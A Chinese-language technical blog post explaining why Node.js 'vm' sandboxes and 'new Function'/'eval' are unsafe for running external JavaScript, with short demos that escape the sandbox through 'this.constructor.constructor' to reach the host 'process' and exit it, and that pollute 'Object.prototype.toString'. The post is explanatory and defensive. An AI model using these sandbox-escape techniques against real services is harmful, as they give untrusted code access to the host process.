在某些特别的场景下,我们需要编译执行外部输入的JS代码。在浏览器端,我们可以借助new Function
、eval
等API。而在 node 端,我们可以借助vm
模块实现一个沙箱,运行外部输入的JS 代码。但无论是浏览器端,还是node端,这些操作都有安全隐患。
外部输入的JS代码可以利用JS语言的特性,从而破坏主程序的环境。
目前,笔者了解到主要有两种方式攻击主程序
方式一:通过 new Function
、 eval
在创建时,能获取到全局变量的特性,对主程序的环境进行破坏。
以 vm 实现沙箱加载外部代码为例:
const vm = require('vm');
const script = new vm.Script(`
var foo = (new Function('return process'))();
foo.exit()
`)
const context = vm.createContext({
Function: Function
})
script.runInContext(context) // 此处直接退出进程,下面的代码都不会执行
console.log("process is exited ?")
此段代码中,通过外部的Function
构造器, 使得生成的函数能够访问到外部的上下文,拿到process对象,直接把进程退出了。
实际上,我们不传递Function
给沙箱的话,沙箱内部的代码同样可以通过JS的原型链的机制,拿到外部的Function
构造器:
const vm = require('vm');
const script = new vm.Script(`
var foo = (new this.constructor.constructor('return process'))();
foo.exit()
`)
const context = vm.createContext() // 此处不把外部的Function传递进去
script.runInContext(context) // 此处直接退出进程,下面的代码都不会执行
console.log("process is exited ?")
上面的沙箱里面的代码,可以通过访问沙箱内部的上下文this
的contructor
属性拿到外部的Object
构造器,再通过Object
的contructor
属性直接拿到外部的Function
构造器。
方式二:通过原型链方法劫持、污染
同样以 vm 实现沙箱加载外部代码为例:
const vm = require('vm');
const script = new vm.Script(`
this.constructor.prototype.toString = function() {
console.log("hehe")
}
`)
const context = vm.createContext({
console: console
})
script.runInContext(context)
let a = { name: 1 }
console.log(a, a.toString())
内部沙箱代码通过获取外部的Object
构造器,改写原型上的toString
方法,达到原型链方法破坏的目的。
总结
由于JS某些神奇的语言特性,直接编译执行外部输入的JS代码,是一件很危险的操作。说到底,想要解决某些问题,必须先了解根源。